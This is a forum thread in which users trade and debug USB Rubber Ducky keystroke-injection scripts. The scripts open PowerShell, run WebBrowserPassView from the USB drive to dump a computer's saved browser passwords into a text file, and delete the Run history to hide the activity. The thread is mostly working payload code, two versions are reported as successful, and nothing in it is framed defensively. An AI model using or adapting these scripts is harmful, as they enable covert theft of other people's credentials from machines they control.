Jump to content
macroliux

Chrome Password exctract and twin duck.

Recommended Posts

Hi, new to the ducky world and have been researching and reading as much as I can fine. The issue I need help with is that the ducky launches powershell and then the program I tell it to, but the keyboard commands to highlight the text and save file doesn't work. Here's the commands I'm running:

REM opens powershell
DELAY 1000
GUI r
DELAY 100
STRING powershell
ENTER
DELAY 500
REM removes run history
STRING powershell "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue"
ENTER
DELAY 200
REM navigates to USB drive called _ for me
STRING $usbPath = Get-WMIObject Win32_Volume | ? { $_.Label -eq '_' } | select name
ENTER
DELAY 500
STRING cd $usbPath.name
ENTER
DELAY 500
REM runs WebrowserPassView from ducky drive
STRING start-process -nonewwindow -filepath ./WebBrowserPassView.exe
ENTER
DELAY 5000
CTRL A
DELAY 500
CTRL S
DELAY 500
STRING PASSWORD
DELAY 50
ENTER

 

Has anyone else had this issue and found any solutions?

Share this post


Link to post
Share on other sites
1 hour ago, SM0K3_l said:

Im doing the same payload,

but mine looks very different are you getting stuck on the select all and save portion?

 

This is the final code I've ended up with that works for me on every PC I've tested it on (about 6).

 

REM opens powershell
DELAY 5000
GUI r
DELAY 2000
STRING powershell
ENTER
DELAY 100
REM navigates to USB drive called _ for me
STRING $usbPath = Get-WMIObject Win32_Volume | ? { $_.Label -eq '_' } | select name
ENTER
DELAY 500
STRING cd $usbPath.name
ENTER
DELAY 200
REM runs WebrowserPassView from ducky drive
STRING CMD
ENTER
DELAY 200
STRING WebBrowserPassView.exe /stext pass_%computername%.txt
ENTER
DELAY 1000
STRING exit
ENTER
DELAY 500
REM removes run history
STRING Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue
ENTER
DELAY 100
STRING exit
ENTER

Share this post


Link to post
Share on other sites

Thank you it finally worked the other version of the application was the problem

what I ended up with 

DELAY 750
ALT SPACE
STRING N
DELAY 500
REM opens powershell
GUI r
DELAY 750
STRING powershell
ENTER
DELAY 250
REM navigates to USB drive called _ for me
STRING $usbPath = Get-WMIObject Win32_Volume | ? { $_.Label -eq 'DUCKY' } | select name
ENTER
DELAY 500
STRING cd $usbPath.name
ENTER
DELAY 200
REM runs WebrowserPassView from ducky drive
STRING CMD
ENTER
DELAY 200
STRING WebBrowserPassView.exe /stext pass_%computername%.txt
ENTER
DELAY 1000
STRING exit
ENTER
DELAY 500
STRING exit
ENTER

Share this post


Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

Loading...

  • Recently Browsing   0 members

    No registered users viewing this page.

×
×
  • Create New...